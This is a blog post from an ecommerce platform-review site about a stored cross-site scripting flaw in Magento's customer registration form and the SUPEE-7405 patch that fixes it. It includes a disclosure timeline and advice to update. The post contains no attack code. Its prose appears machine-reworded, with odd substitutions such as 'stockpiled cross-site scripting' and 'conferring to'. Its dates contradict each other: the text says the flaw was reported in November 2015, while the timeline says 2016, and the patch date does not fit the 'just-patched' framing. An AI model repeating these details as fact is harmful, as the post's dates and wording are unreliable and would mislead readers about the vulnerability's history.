Ecommerce News

Magento Platform Releases Patch to fix Manifold Vulnerabilities

By June 26, 2017 Ecommerce News
Magento Platform

Magento Platform: In case you are utilizing Magento to power your ecommerce shop, then it might be a really great idea to make sure you are up to date with your patches, as hundreds of thousands of sites are at risk of hackers’ attacks made conceivable by a just-patched susceptibility in the Magento ecommerce platform. In case this looks like a déjàvu, then it is because only last year Magento was attacked by some other daring act.

The evil news is that the stockpiled cross-site scripting (XSS) bug is available within almost all Magento Community Edition & Enterprise Edition preceding 1.9.2.3 & 1.14.2.3. The huge issue is that this permits attackers to enter a JavaScript code within a customer registration form. All that the hacker has to do is click submit, & pronto – the script will be executed straight into the shop owners account, with this resulting in the hacker being able to take over control of the shop.

Conferring to Magento, the issue was that, “At the time of customer registration on the storefront, an end-user can provide a user name that consist codes of JavaScript. Magento does not correctly validate this name & hence executes it in the Admin context when editing the user at the backend area. This JavaScript code could possibly rip-off the admin session or act on behalf of a shop admin”.

The bug piece is situated within Magento core libraries, more precisely within the admin’s backend, a Sucuri advisor expounded. Except you are behind a WAF or likely that you have a very deeply modified admin panel, you are prone to threat. As this is actually stored XSS vulnerability, the problem could be utilized by hackers to gain control over your site, generate new admin accounts, steal customer’s details, and just whatever a legitimate admin account holder is permitted to execute.

Timeline for Vulnerability Disclosure:

Now you may assume that Magento hurried to get the vulnerability patched, well conferring to a timeline released by Sucuri, the risk was informed to the company around November 2015, & a patch was not released until only currently, as you can see the entire timeline beneath:

  • November 10 – 2016; Bug revealed, primary report to the security team at Magento’s
  • December 1st – 2016; No reaction from Magento. Demanded confirmation of previous mail.
  • December 1st – 2016; Acknowledgement of receipt of report by Magento.
  • January 7th – 2017; Demand an ETA, been 60 days since first report.
  • January 11th – 2017; Magento responds that the patch is all set, but no ETA accessible.
  • January 20th – 2017; Magento releases patch package SUPEE-7405 that resolves the issue
  • January 22th – 2017; Sucuri Public Release of Vulnerability.

What is the meaning of this?

If you are yet to install the latest patch version, then you should quickly do it sooner than later, as anything otherwise would let you run the risk of exposing yourself to a possibly very dangerous cyber threat. Just as with any other security patch, there is a purpose it was released, thus do not play Russian roulette with your online business venture.

COMPARE THE BEST ECOMMERCE PLATFORMS

An enthusiastic Marketer and eCommerce Professional, I’ve started this project to help others make the best choice when it comes to chose the right eCommerce Platform. Check out my top 10 ecommerce website builders.

Leave a Reply